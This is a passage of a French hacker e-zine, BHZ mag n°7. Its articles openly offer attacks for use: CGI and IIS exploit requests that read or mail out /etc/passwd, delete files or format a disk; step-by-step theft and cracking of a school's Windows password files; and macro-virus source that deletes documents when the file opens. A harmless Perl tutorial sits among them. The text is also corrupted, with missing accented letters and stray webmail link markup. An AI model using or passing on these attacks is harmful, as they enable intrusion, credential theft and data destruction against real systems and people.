The Belgian Hackers Zone : http://www.thebhz.org  -  http://www.thebhz.com  -                                                                                                                                                                                 	                     http://www.bhz.be.tf  -  http://members.xoom.com/thebhz  -   	                     http://thebhz.ctw.net


TTTTTTTTTTTTTTT   HHH      HHH   EEEEEEEEEEE
      TTT         HHH      HHH   EEEEEEEEEEE
      TTT         HHH      HHH   EE
      TTT         HHH      HHH   EE
      TTT         HHH      HHH   EEEEEEEE
      TTT         HHHHHHHHHHHH   EEEEEEEE
      TTT         HHH      HHH   EE
      TTT         HHH      HHH   EE
      TTT         HHH      HHH   EE
      TTT         HHH      HHH   EEEEEEEEEEE
      TTT         HHH      HHH   EEEEEEEEEEE


                                                     ZZZZZZZZZZZZZZZZZZZZZZZZ
   BBBBBBBBBB              HH          HH          ZZZZZZZZZZZZZZZZZZZZZ
   BBB    BBBBBB           HH          HH                           ZZZ
   BBB       BBBB          HH          HH                         ZZZZZ
   BBB         BBBBB       HH          HHH                       ZZZ
   BBB           BBBB      HH          HHH                      ZZZZ
   BBB             BB      HH           HH                     ZZZZ
   BBB            BB       HH           HH                    ZZZ
   BBB           BBB       HH          HHH                   ZZZZ
   BBB        BBBBB        HH          HHH                  ZZZZ
   BBB      BBBBB          HH          HHH                 ZZZZ
   BBB     BBBB            HHHHHHHHHHHHHH                ZZZZZZ
   BBB  BBBBB             HHH          HHH             ZZZZZZ
   BBBBBBB                HHHHHHHHHHHHHHH            ZZZZZZ
   BBB  BBBBB             HHH          HH           ZZZ
   BBB     BBBB           HHH          HH          ZZZZZ        
   BBB       BBBBB        HHH          HH       ZZZZZZZ            
   BBB        BBBBB       HHH          HH      ZZZZZZZZ                                                 
   BBB       BBBBB        HHH          HH     ZZZZZZZZ
   BBB      BBBBBB        HHH          HH     ZZZZZZZZZZZZZZZZZZZZZ
   BBBBBBBBBBBB           HHH          HH      ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ





_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________
_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________







bbb    h     h  zzzzzzzzzzz                                    77777777777777
b bb   h     h           z                                                77
b  bb  h     h          z                                                77
b   b  h     h         z                                                 77
b  bb  h     h        z          m     m    aaaa     ggg                77
b bb   hhhhhhh      zz           mm   mm    a  a    g               777777777
bbb     h     h    zz            m m m m   a    a  g                   77
b  b    h     h   z              m  m  m   a aa a  g  gggggg          77
b   b   h     h  z               m     m   a    a  g    g            77
b  b    h     h z                m     m  a      a  g   g           77
bbb     h     h zzzzzzzzzzzz     m     m  a      a   ggggg         77



_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________
_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________



                                 SOMMAIRE

             >-------------------------------------|-------------------->
             |            ARTICLE                  |       AUTEUR       |       
             <-------------------------------------|-------------------->
             | Introduction                        |  Asmodeus          |
 1...........| Exploits                            |  tRaSH             |  
 2...........| Turorial sur le Perl                |  Asmodeus          |  
 3...........| Voler les mots de passe de son ecole|  wHyAnGeL          |  
 4...........| Programmation de macro-virus        |  tRaSH             |  
 5...........| Coupleur tlphonique               |  Cyriusvirus       |      
 6...........| Buffer Overrun de MSIE              |  wHyAnGeL          |       
 7...........| Telnet Dcortiqu                   |  tRaSH             |       
 8...........| Tutorial de cracking n3            |  GRIm@             |       
 9...........| Hacker sa fac                       |  CyriusVirus       |
 10..........| Vidage de la pile CMOS              |  tRaSH             |       
 11..........| Mode d'emploi de la VMB IGLO-OLA    |  nada              |       
 12..........| Les code-barres                     |  CyriusVirus       |
 13..........| L'Intelink                          |  nada              |       
 14..........| Hack defi                           |  tRaSH             |       
 15..........| Securiser son systeme Linux         |  Asmodeus          |
 16..........| Les requests des scripts CGI        |  wHyAnGeL          |
 17..........| La chtite pensee anarchique n2     |  GRIm@             |
             | Mot de la fin                       |  Asmodeus          |
             <-------------------------------------|-------------------->             


_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________
_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________


	BHZ mag n7, dej.  En ce debut d'annee scolaire, quand tous s'appretent  reprendre le chemin du travail, voire ont dej repris, BHZ Mag n7 est l. Apres avoir consacre une bonne partie de ces vacances  sa redaction (souvenez vous : BHZ mag n6 est sorti le 14 juillet). Quel constat pouvons nous tirer en lisant ce zine ? Le BHZ est vraiment devenu un groupe, un ensemble, en regardant la partie "auteurs" du sommaire, on peut voir six noms, le groupe est compose de 11 membres, tous les autres, ceux qui n'ont pas participe  la redaction de ce zine sont quand meme restes actifs quand ils etaient chez eux. Certains peut etre un peu trop actifs (comme par exemple quand Flat Eric s'amuse  me faire courrir parce qu'il a la bonne idee de piquer un lecteur de carte  puces en pleine journee, quand GRIm@ me bat aux Echecs-VMB, quand Flat Eric essaie de phreaker les cabines Belgacom avec comme simple outil son super-couteau-qui-tue, etc...)   Bon comme vous avez du le remarquer en lisant le sommaire, certains ont ecrit plus d'articles que d'autres et, comme vous le remarquerez en lisant le zine, certains articles sont (beaucoup) plus longs que d'autres. On s'en fout completement, ce qui compte c'est ce qu'il y a dedans. Voil c'est tout. Bonne lecture.




 1. Exploits                              by tRaSH       <judasnana@caramail.com>
 2. Tutorial sur le Perl                  by Asmodeus    <asmodeus@mail.be>
 3. Voler les mots de passe de son ecole  by wHyAnGeL    <clm_whyangel@hotmail.com>
 4. Programmation de macro-virus          by tRaSH       <judasnana@caramail.com>
 5. Coupleur telephonique                 by Cyriusvirus <cyriusvirus@yahoo.fr>
 6. Telnet decortique                     by tRaSH       <judasnana@caramail.com>
 7. Buffer Overrun de MSIE                by wHyAnGeL    <clm_whyangel@hotmail.com>
 8. Tutorial de cracking                  by Grim@       <grima@zone14.org>
 9. hacker sa fac                         by CyriusVirus <cyriusvirus@yahoo.fr>
10. Vidage de la pile CMOS                by tRaSH       <judasnana@zone14.org>
11. Mode d'emploi de la VMB Igloo-Ola     by nada        <n_a_d_a@mail.be>
12. les codes barres                      by CiriusVirus <cyriusvirus@yahoo.fr>
13. L'Intelink                            by nada        <n_a_d_a@mail.be>
14. Hack defi                             by tRaSH       <judasnana@caramail.com>
15. Securiser son systeme Linux           by Asmodeus    <asmodeus@mail.be>
16. Les requests des scripts CGI          by wHyAnGeL    <clm_whyangel@hotmail.com>
17. La chtite pensee anarchique n2       by GRIm@       <grima@zone14.org>
18. Le mot de la fin                      by Asmodeus    <asmodeus@mail.be>



_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________
_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________



     ************
     * Exploits *
     ************

Auteur : tRaSH

-Exploit : quest ce quun exploit ? Cest une commande ou une suite de commande 
qui, une fois rentre, permettent de 
chopper le root sur un serveur. Les exploits sont trouves par une personne 
quelconque (toi ou moi), qui tombe dessus
soit par hasard ou en cherchant longtemps. Un des exploits des plus connus est 
quote user FTP, sous FTP. Il existe des 
millions dexploits trouves ou (encore) inconnus, EN CHASSE ! ! !
Exemple dexploit sous IIS, serveur NT 
:<a target="new" href="http://www.victime.com/scripts/iisadmin/">http://www.victime.com/scripts/iisadmin/</a>
Cet exploit fonctionne comme ceci, lURL va chercher le fichier pwd de ladmin 
du serveur sous IIS. Je dis exploit,
mais on peut aussi choper le root en trouvant le fichier pwd, faisant du social 
engineering, voici un chtit trucs 
(attrape lame) sur lequel je suis tombe (par hazard) : Le type disait que pour 
devenir admin sur caramail, 
ctait trs simple. On remplissait son formulaire (demandant pseudo et pass 
caramial) et on faisait ok  
cest sans dire quok rsultait  envoyer ses infos a son e-mail (au passage, 
son e-mail tait <a onmouseover="window.status='Add hack_admin@caramil.com to Your Address Book';return true;" onmouseout="window.status='';return true;" href="addressbook.cgi?un=asmodeus&uid=RIFd9icd3gT3UCAvz4tX8KgW2U&aa=create_alias&ea=hack_admin@caramil.com&nf=0">hack_admin@caramil.com</a> 
pour augmenter le ralisme sans doute !)Cet exemple prouve que lon peut trouver 
des exploits de la mort en 4 
commandes comme on peut trouver des pass en profitant de faille 
encore plus vulnrable : les gens !
Voici une liste de bugs cgi et dexploit dcortiqu :
<a target="new" href="http://target.com/cgi-bin/perl.exe?-e?">http://target.com/cgi-bin/perl.exe?-e?</a>'format?c:'        
Exploite perl pour formater le disque c : , con mais efficace
<a target="new" href="http://target.com/cgi-bin/perl.exe?-e?">http://target.com/cgi-bin/perl.exe?-e?</a>'format%20c:'        Idem
<a target="new" href="http://www.target.com/cgi-bin/perl.exe?&-e">http://www.target.com/cgi-bin/perl.exe?&-e</a>+unlink+%3C*%3E  La, cest un peu 
mieux, vous savez que pour avoir une URL,
on sadresse a une  boite qui associe votre IP a lURL dsire, ok ?
Cette commande dfait le lien URL=&gt; IP, donc erreur 404 pour ceux qui tape lURL 
de la cible
L, je vais me faire taper sur les doigts par x pass car il ma demande 
dexpliker TOUS les exploits que je mets voici
une liste dexploit a essayer sur des serveurs, mais ca depend des logiciels que 
ladmin a install 
Aglimpse, exploit a faire en telnet port 80 (il faut que la bcane aie aglimpse) 
tapez ceci dans telnet (en remplaant
<a onmouseover="window.status='Add moi@ici.be to Your Address Book';return true;" onmouseout="window.status='';return true;" href="addressbook.cgi?un=asmodeus&uid=RIFd9icd3gT3UCAvz4tX8KgW2U&aa=create_alias&ea=moi@ici.be&nf=0">moi@ici.be</a> par votre e-mail) 
GET /cgi-bin/aglimpse/80|IFS=5;CMD=5mail5hack\<a onmouseover="window.status='Add moi@ici.be to Your Address Book';return true;" onmouseout="window.status='';return true;" href="addressbook.cgi?un=asmodeus&uid=RIFd9icd3gT3UCAvz4tX8KgW2U&aa=create_alias&ea=moi@ici.be&nf=0">moi@ici.be</a>\ 
&lt;/etc/passwd;eval$CMD;echo HTTP/1.0
La commande demande au serveur denvoyer etc\passwd (fichier password) a 
<a onmouseover="window.status='Add moi@ici.beOu to Your Address Book';return true;" onmouseout="window.status='';return true;" href="addressbook.cgi?un=asmodeus&uid=RIFd9icd3gT3UCAvz4tX8KgW2U&aa=create_alias&ea=moi@ici.beOu&nf=0">moi@ici.beOu</a> encore en telnet (cette fois, 
il faut campas)
GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a
Le fichier password est dit sous telnet par cat (sous linux), on va profiter 
du cat de la victime, non mais !
Il faut carbo, url a taper (en remplaant file_a_voir par ce que vous voulez 
genre passwd.pwd ou autre)
<a target="new" href="http://www.ici.be/carbo.dll?icatcommand=file_a_voir&catalogname=catalog">http://www.ici.be/carbo.dll?icatcommand=file_a_voir&catalogname=catalog</a>
Sous NT, il faut cgimail et quun user voie cette page : 
 &lt;form action="/scripts/CGImail.exe" method="POST" NAME="TestForm"&gt; 
 &lt;input type=hidden name="$File$" value="/scripts/template.txt"&gt; 
 &lt;input type=hidden name="$Subject$" value="CGImail Example"&gt; 
 &lt;input type=hidden name="$LocationOK$" value="/ok.html"&gt; 
 &lt;input type=hidden name="$LocationKO$" value="/ko.html"&gt; 
 &lt;input type=hidden name="$To$" value="<a onmouseover="window.status='Add moi@ici.be to Your Address Book';return true;" onmouseout="window.status='';return true;" href="addressbook.cgi?un=asmodeus&uid=RIFd9icd3gT3UCAvz4tX8KgW2U&aa=create_alias&ea=moi@ici.be&nf=0">moi@ici.be</a>"&gt; 
 &lt;input type=hidden name="$Optional$" value="mmmh, no!"&gt; 
La, ca envoie le fichier /scripts/template.txt  <a onmouseover="window.status='Add moi@ici.be to Your Address Book';return true;" onmouseout="window.status='';return true;" href="addressbook.cgi?un=asmodeus&uid=RIFd9icd3gT3UCAvz4tX8KgW2U&aa=create_alias&ea=moi@ici.be&nf=0">moi@ici.be</a>, bien sur on peut 
remplacer template.txt par autre chose.
Dumpenv.pl, sous NT ou win 95/98 : <a target="new" href="http://www.site.net/c">http://www.site.net/c</a>:/program 
files/sambar41
Cool, si le serveur a ce fichier, vous pourrez alors remonter dans 
larborescence des fichiers (et arriver dans c : \, le rve). On peut le refaire 
ds que lon connat (et quon est 
sur) de lemplacement dun fichier. Bon, je peux pas vous mettre plus dexploit 
car il y en a des centaines voir 
des milliers, a vous de trouver.


_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________
_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________





     ********************************
     * Tutorial sur le langage Perl *
     ********************************

Auteur : Asmodeus

     Le PERL (Practical Extraction and Report Language) est (comme l'indique son 
nom), un langage d'extraction et 
de rapport. On peut s'en servir pour beaucoup de choses (un scanneur de failles 
CGI par exemple). Ses premieres 
utilites furent, par exemple, le listing de fichiers d'un tel type dans des gros 
repertoires ou l'exploration de
tres gros fichiers (des logs par exemple)  la recherche d'un mot ou d'une 
expression.

     C'est,  l'instar du Java, un langage interprete (ce qui signifie qu'une 
compilation n'est pas obligatoire, 
tant que l'on a un interpreteur pour son systeme d'exploitation (il est donc 
multi-plateformes) On peut, cependant, 
grace  des utilitaires comme perl2exe, creer des executables Windows pour ceux 
qu ne disposent pas d'un interpreteur 
ou si l'auteur ne veut pas montrer la source de son programme.

     Un des autres avantages du Perl, par rapport  de plus anciens langages, 
est ses possibilites au niveau 
d'Internet et des reseaux. (Sans pour autant avoir besoin de tout plein de 
bibliotheques...)

     Le langage PERL a ete invente par Larry Wall. C'est un des lanages les plus 
utilises pour la programmation 
de CGI. (definition : Une interface cgi-bin est constitu dun excutable qui 
peut tre crit dans nimporte quel 
langage de programmation, capable de recevoir sur le flux dentre standard, ou 
en arguments, les donnes correspondant
 une "requte" mise par le "client" via un "formulaire", danalyser et traiter 
ces donnes, et capable de lui donner
une rponse ou dexcuter une action telle quinscription dans une base de 
donnes, mission dun courrier lectronique,
 dun fax, mise en page dynamique dun rsultat de recherche, etc...)

A priori, nimporte quel langage de programmation pourrait convenir, du moment 
que les ressources du langage permettent :

- La lecture du flux de donne dentre ou la rcupration de paramtres donns 
par la ligne de commande.

- Lcriture dune rponse sur le flux standard de sortie, par dfaut redirig 
vers le socket darrive de lutilisateur.

     Historiquement, le dveloppement de serveurs Internet ayant t trs 
fortement li au monde Unix (ce qui est 
normal d'ailleurs), les deux langages majeurs actuels servant au codage des 
cgi-bin sont le C et le PERL. Lvolution 
rapide des technologies rseau fait apparatre petit  petit des cgi-bin cods 
en Java. Leur nombre est croissant, 
mais encore largement minoritaire par rapport aux " serveurs " crits en C ou en 
Perl.

     Le Perl dispose de structures de donnes trs puissantes pour la gestion de 
donnes sous forme de chanes de 
caractres. De plus, tout comme le shell Unix, le Perl dgage lutilisateur des 
soucis dallocation dynamique de 
mmoire, et offre une grande souplesse dcriture de part son "typage" faible 
(les variables utilisent des types 
implicites qui sont analyss  linterprtation par Perl, et qui ne demandent 
pas de prcautions particulire dans la
majorit des cas).

     La contrepartie de cette souplesse est une certaine limitation du champ 
daction du langage. Le C dispose en 
effet dune bibliothque bien plus large de fonctions et structures prdfinies. 
En outre la syntaxe du Perl, 
rcuprant de nombreuses smantiques du shell Unix et du langage awk, rend ce 
langage plus ardu  matriser. 
(sauf pour ceux qui ont l'habitude de programmer en shell Unix (coucou Veinscuts 
!!!) mais dans ce cas je suppose 
qu'ils connaissent dej un peu le langage Perl et ce tutorial ne les concerne 
alors pas (ou peu)) Mais revoir les 
principes de base d'un langage, ca n'a jamais fait de mal  personne !!! alors 
que vous soyez debutant initie, expert,
voire totalement etranger au langage Perl, si vous lisez ceci c'est que vous 
vous y interessez quand meme. Dans ce cas,
pourquoi ne pas continuer ?

     Les caracteristiques du langage Perl : 

     Le Perl,  linstar du langage script shell, est trs libral en matire de 
types de variables. Les variables 
sont automatiquement affectes  un type au moment de leur premire utilisation. 
En outre, le langage Perl nimpose 
pas, contrairement au C, une dclaration pralable des variables.

exemple : 

     #!/bin/perl

     $variable1 = 12 ;
     $variable2 = "une chane" ;

     Dans l'exemple prcdent, la variable variable2 est automatiquement 
initialise du type "chane" et la variable
variable1 du type entier. Au cas o vous ne l'auriez pas remarque, le $ sert  
la declaration de variables. Quand 
au #!/bin/perl , c'est pour indiquer le repertoire ou se trouve l'interpreteur 
(par defaut /vin/perl).

     Le Perl prend en charge dynamiquement lallocation mmoire ncessaire aux 
structures de donnes, quelles 
soient scalaires ou tableaux. 

Exemple :

     #!/bin/perl

     $tableau[2] = "12" ;

     Le dbut de fichier prcdent cre un tableau de 3 lments et alloue 
automatiquement l'espace ncessaire 
pour deux lments vides, et un non vide contenant la chane "12".

Si dans la suite du programme, la ligne :

     $tableau[10] = 23.4e+12 ;

apparat, le tableau est implicitement tendu en mmoire sans autre intervention 
du programmeur. ( noter que la 
valeur de la variable dans la 10eme case du tableau est ici une flottante)

     Le Perl rsout automatiquement la conversion de variables chane  en 
variables de type scalaire. Si la chane 
ne peut tre interprte comme un nombre valide, quans on l'utilisera dans une 
expression numerique (un calcul quoi) 
le programmera la conversera en valeur nulle (un zero quoi)

Exemple 1 :

     #!/bin/perl

     $variable_num = 333 ;
     $variable_txt = "222" ;
     $somme = $variable_num + $variable_txt ;
     print("$somme") ;

Exemple 2 :

     #!/bin/perl

     $variable_num = 123 ;
     $variable_txt = "plif plaf plouf" ;
     $somme = $variable_num + $variable_txt ;
     print("$somme") ;

Dans l'exemple 1 les deux variables variable_num et variable_txt sont,la 
premiere un nombre, et la deuxieme une chane.
Et pourtant le rsultat est bien 555. La fonction print convertit la valeur 
numrique 555 en chane "555" pour en 
effectuer l'affichage.

     Dans l'exemple 2, le rsultat est 123, la chane "plif plaf plouf" valant 0 
dans son interprtation numrique.

     Le Perl dispose d'une caractristique extrmement utile, et qui lui donne 
une grande partie de sa puissance. 
C'est celle qui consiste  automatiquement dimensionner l'action de certaines 
expressions suivant que la variable 
rceptacle est une variable scalaire, ou une liste.

     De nombreuses fonctions standard du Perl ont ainsi un double 
fonctionnement, et permettent des oprations 
globales sur des tableaux avec la mme syntaxe qu'une opration sur une variable 
scalaire : 

     #!/bin/perl

     $scalaire = &lt;STDIN&gt; ;
     @tableau = &lt;STDIN&gt; ;

     Les deux lignes ci-dessus ont bien la mme forme (lire dans STDIN). Mais 
leur action est quand meme diffrente:

- La premire vient lire une ligne du tampon STDIN et s'arrete au premier \n 
qu'elle rencontre.

- La deuxime lit tout le tampon STDIN, et met chaque ligne dans une nouvelle 
"case" du tableau @tableau.


     Le Perl integre une notion de substitution.Cette notion est rcupre du 
Korn shell Unix. Une variable peut se 
substituer par sa valeur lorsqu'elle est dans une chane de caractres entre 
double cotes.

     #!/bin/perl

     $variable = "Asmodeus" ;
     print("qui est le plus fort ?\n $variable");
     
     qui est le plus fort ?
     Asmodeus


     Types de donnees
     ----------------

     Les 4 structures de donees majeures existant en Perl sont :

-les variables (scalaires, numriques ou caractres)
-les listes
-les tableaux
-les tableaux associatifs

     Une variable scalaire contient un nombre ou une chaine de caracteres. Pour 
etre declaree, son nom doit etre 
precede de $ . Exemples de variables scalaires : "354", "-22", "3_567_890", 
"033", "0x3E" (numeriques). 
Et "je programme en Perl" (chaine de caracteres). Les chaines de caracteres 
doivent etre encadress d'apostrophes ou 
de guillemets ( '  ou  " ).

     Insertion de variables dans des fichiers : 

     #!/bin/perl

     $variable = "waouuuu j ecris dans un fichier" ; 
     open (FILE, "&gt;tralala" ;
     print FILE ("$variable") ; 
     close (FILE) ;

     Ce script cree un fichier tralala (dans le meme repertoire que le script) 
et ecrit dedans la variable $variable.


     Une liste en Perl est une association de variables scalaires, dans un 
certain ordre. Ces listes peuvent tre 
ranges sous forme d'une variable tableau, ou d'un tableau associatif.

     Une liste peut runir tout type de donnes, y compris des variables, et 
dans ce cas la valeur de l'lment de
la liste prend la valeur de la variable au moment o la liste est interprte.


     La fonction des tableaux consiste  reunir des lments dans une table 
indexe. En Perl, l'absence de typage 
permet de construire des tableaux contenant des valeurs numriques ou des 
chaines de caractere. Un tableau est 
toujours utilis en faisant prcder son nom du @. Chaque element d'un tableau 
est une variable scalaire portant
le mme nom que le tableau et donc prcde de $ et suivi de l'index. Exemple :

     #!/bin/perl

     $variable = "tralala" ;
     @tableau = (1, 2.35, "une chaine\n", "$variable") ;
     print ("$tableau[1]\n") ;
     print ($tableau[3]) ; 
     }

Le resultat :

1
une chaine


     Les tableaux associatifs ont la meme fonction que les tableaux normaux. La 
difference c'est le mode d'indexage
du tableau. L'index utilis dans les tableaux associatifs est une chaine de 
caractre. Ils permettent donc d'associer 
n'importe quelle valeur  une chane, par exemple la chane "masculin"  la 
chane "sexe" dans un tableau %identite 
qui dfinirait les caractristiques d'une personne. L'accs  une variable 
contenue dans un tableau associatif se fait
par une variable scalaire du mme nom que le tableau indexes par une chane 
contenue dans une expression {}.
     
     #!/bin/perl

     $identite{"sexe"} = "masculin" ;
     $identite{"age"} = "69" ;
     $identite{"taille"} = 1.72 ;
     foreach $membre (%identite)
     {
     print("$identite{$membre}\n") ;
     }

     Le resultat :
masculin
69
1.72


     Les operateurs
     --------------

     Alors dans les operateurs y'a les operateurs arithmetiques qui sont les 
memes qu'en C :
- soustraction, + addition, * multiplication, / division, %modulo, ** 
exponentiation.
     Les operateurs de comparaison :
== est egal , =! n'est pas egal , &gt; est plus grand que, &lt; est plus petit que, 
&gt;= plus grand ou egal, &lt;= plus ptit 
ou egal. Ces operateurs servent pour les valeurs numeriques. Pour les 
comparaisons de chaines les operateurs sont les
suivants : eq  est egal , ne  n'est pas egal, gt  est plus grand que, lt  est 
plus ptit, ge  plus grand ou egal, le  
plus ptit ou egal.
     Les oprateurs binaires : & et binaire, | ou binaire, ^ ou exclusif 
binaire, - complment  1, &lt;&lt; dcalage vers
 la gauche, &gt;&gt; dcalage vers la droite.
     Les operateurs logiques : &&  et logique, ||  ou logique, ! negation 
logique. Il y a aussi les and, or, not et 
xor.
     Les operateurs arythmetioques peuvent se combiner  = pour devenir un 
operateur d'affectation (+= est 
incrementation par exemple). (hum tout ca ressemble beaucoup au C non ?)
     Les operateurs de repetition de chaines permettent de... repeter des 
chaines !! exemple :

     #!/bin/perl

     $variable1 = "prout " ;
     $variable2 = $variable1 x 6 ;
     print ("$var2") ;

le resultat : prout prout prout prout prout prout 

	Les instructions
	----------------

if condition {partie1} else {partie2}
	Cette instruction execute la partie1 si la condition "condition" est vraie sinon elle execute la partie2. Y'a aussi
{partie1} unless condition
	Ca veut dire qu'il execute la partie & sauf si la condition est vraie.

while condition {partie1} il execute la partie 1 tant que la condition est vraie.
Pour sortir d'une boucle, on peut utiliser les instructions Last ou Next.

	Les operateurs de recherche : ce sont des operateurs permettant des recherches avec plusieurs options : x : ignore les blancs ; g : cherche tous les modeles ; i : ignore la casse ; s : chaine --= une seule ligne ; m : chaine --= plusieurs lignes ; o : traite le modele une fois.

	$var =~ /[tralala]/xgismo


	Lire et ecrire dans les fichiers
	--------------------------------

manipulation : voici les operations effectuables avec les fichiers et les repertoires : manipulation, deplacement, rennomer, lister, etc...
Les commandes :
mkdir : cree un repertoire
chdir : change de repertoire
opendir : ouvrir un rep pour le lire
readdir : lit la prochaine entree d'un repertoire
telldir : indique la position dans le repertoire
seekdir : change de position
rewinddir : revenir au debut du repertoire
closedir : fermer le repertoire
rmdir : supprimer le repertoire

Pour ouvrir un fichier on utilise la commande open()
open (FICHIER, "tralala.txt");
et pour le fermer la commande close()
close(FICHIER);

Pour lire on utilise la fonction read()
read(FILE, $variable, Longueur, SkipOption);
$variable represente la variable o on stocke les caracteres lus. Longueur represente le nombre de caracteres.

Pour ecrire dans un fichier, on utilise les commandes print(), printf(), write() une fois celuici ouvert.
print fichier (liste_d_arguments);

Pour se deplacer dans un fichier, on utilise les commandes seek() et tell() 
seek(FICHIER, $distance, 1)
distance est la valeur du deplacement (positif pour en avant et negatif pour en arriere)

Ce tutorial est  utiliser en plus des fichiers d'aides fournis avec l'interpretreur gnu qui decrivent TOUTES les commandes. Toutefois, dans un prochizn zine, j'ecrirai la suite de ce tutorial qui comprendra les commandes importantes autres que celles vues ici.


_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________
_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________


	*******************************************************
	* Comment voler tous les mots de passe de votre ecole *
	*******************************************************

Auteur : wHyAnGeL 
Date : 01.08.00 
Titre : Comment voler tous les mots de passe de votre cole. 
Avant de commencer cet article je tiens  remericer @nTraX qui m'a aid  raliser ce projet. Je crois que sans lui je n'y serais pas parvenu aussi vite. 

Comme vous le savez certainement, toutes les cole travaile sous Windows NT (IIS 4.0 la plupart du temps), je n'ai jamais vu ou entendu parler d'une cole qui travailler avec Linux RedHat ou bien un autre du mme type (j'ai dit RedHat car c'est le Linux grand public). Ce ne serait pas srieux de la part d'une cole litiste (mouharf !) de travailler avec un OS en open source. 

Sachez tout d'abord qu'il y a souvent quatre types d'accs : 
* Ceux des lves qui se rsume souvent  internet, interdiction d'utiliser les disque amovible tel que les disquettes ou les zip. 
* Les proffesseur qui peuvent faire le mme que vous, plus imprimer et enregistrer des donnes sur un disque amovible. 
* Les 'sk00l r00tz' ou plutot les admins, souvent se sont des professeur qui ne savent mme pas coder, ils peuvent tout faire sauf changer de proxy et supprimer les accs des admistrateurs.
[ND Asmodeus : c'est le prototype des gens que je deteste et qui me detestent (mais pourquoi donc ?)] 
* Les 'adm1n1stratorz' (ca me fais trop rire :), ils peuvent tout faire, mais ne viennent jamais sur les lieux sauf si un problme grave se pose, style hack du serveur ou coup de pied au cul du PC n5 :).

Windows utilise deux faons de logger les codes (en fait c'est juste une encryption diffrente et un autre format de fichier). Il existe les *.sam et les *.pwl. Comme les coles utilisent (presque) tout le temps le systme de login en *.pwl, c'est sur ceux l que nous allons nous attarder. J'ai oubli de vous dire que pwl signifie password list. 

@nTraX ayant trouv une faon de procder assez simple mais qui ne fonctionne pas tout le temps, j'ai en cr une autre et je vous explique les deux. La premire tant plus facile mais il faut que vous pouviez avoir accs au root directory c'est  dire  la racine, o sont stock tous les *.pwl. 

=============== 
== Facon n1 == 
=============== 

* Essayez d'avoir le mot de passe d'un copain (hh)  vous pour dmarrer votre session, ce sera plus sur. Si vous n'en avez pas trouvez, ce n'est rien utilisez le vtre. 
* Trouvez un HD vide sur le PC, normallement ca ne devrait pas tre trop dur, il y en a plein. 
* Passez par le poste de travail ou par l'explorateur Windows pour allez dans le dossier C:\Windows ou c:\Win NT. 
* Rorganisez les icnes par type et slectionnez tous les *.pwl. 
* Faites copier (ctrl+c). 
* Faites coller dans l'HD vide (ctrl+v). 
* Si un quelconque progs de scurit vous en empche, clickez avec le boutton droit de la souris et envoyer les vers A:\, c'est  dire la disquette. Si le lame scurity  vous en empche toujours passez  la faon n2. 
* Aprs la prise de passwords le dcryptage, pour ce faire utilisez un petit utilitaire nomm Cain (la version 1.51 minimum s'impose), tu peux le downloader  cette URL : http://warex.box.sk/crackers.htm. 
* Installez le et xcutez le. 
* Cliquez sur l'icne  gauche nomm PWL Files (les troisimes en partant du bas vers le haut). 
* Cliquez sur le + (en au  gauche) et ajoutez vos copies. 
* Crackez les. Explication : si le fichier s'appelle e2e11.pwl l'usre name sera e2e11. Prenez exemple sur votre password pour le crack, ne mettez pas les caractres spciaux quand vous crackez par brute force. 
* Si vous n'avez qu'une heure, se ne sera pas assez, laissez le cracker et apuyez sur alt+del pour le cacher. Vous reviendrez en fin de journe, pour le faire raparatre appuyez sur alt+pgup. 

=============== 
== Faon n2 == 
=============== 

Il suffit de faire la mme chose qu' la faon n1  part que pour voir les *.pwl vous devez taper sous dos : 
dir %systemroot\*.pwl 
Normallement ceci va apparatre : 
Volume in drive C has no label 
Volume Serial Number is 6352-7G15 
Mais avec vos informations. 

Bon crack ! 


_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________
_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________





     ********************************
     * Programmation de macro virus *
     ********************************

Auteur : tRaSH

-programmation de macro virus : une macro est un mini programme intgr dans un 
document word. 
Ces programmes sont cris en Visual Basic, et trs simple a raliser. Crez un 
nouveau document Word, enregistrez le 
et cliquez sur outils, macro, macro, ok ?
Tout d'abord, le programme doit contenir comme premire ligne sub "AutoOpen " 
qui permettra de lancer le programme 
automatiquement au chargement du fichier word. Comme dernire ligne, il devra 
contenir "sub viewvbcode " puis 
directement "end " a la ligne suivante, c'est pour rendre la macro invisible. La 
programmation ressemble de loin  
du Q-Basic avec des commandes qui diffrent 
lgrement. Voici un exemple de programme commente (les commentaires sont 
prcde d'une " '  " ) :

sub autoOpen ()''macrovirus
'macro enregistree le 0/0/00 par tRaSH' 
msgBox "voici une macro "  'affiche l'avertissement "voici une macro "    
kill "c : \*. doc "  'detruit tous les fichiers doc present dans la racine
msgBox " systeme bloque ", SystemModal + vbOKCancel " 'affiche 'l'avertissement 
" systeme bloque " et 'bloque tout le 
systeme tant que l'on n'a 'pas clicke sur ok ou annuler
num = int(rnd * 10) 'tire un nombre au hazard compris entre 1 et 20
msgBox num 'affiche le nombre tire au hazardendOn peut faire mieux :
Sub autoOpen ()Num = int(rnd * 10)If num = 6 then kill  "c : \*. * "
Else msgBox "tu as de la chance "End
Ce programme est une sorte de casino de la mort. Il y a des centaines de 
commandes, pour en savoir plus, consulte un 
bon bouquin sur le visual basic.

_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________
_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________



     *************************
     * Coupleur telephonique *
     *************************

Auteur : CyriusVirus

Introduction 
Vous avez toujours reve pouvoir hacker a partir de votre ordinateur et d' un 
telephone cellulaire (phreak ou non). 
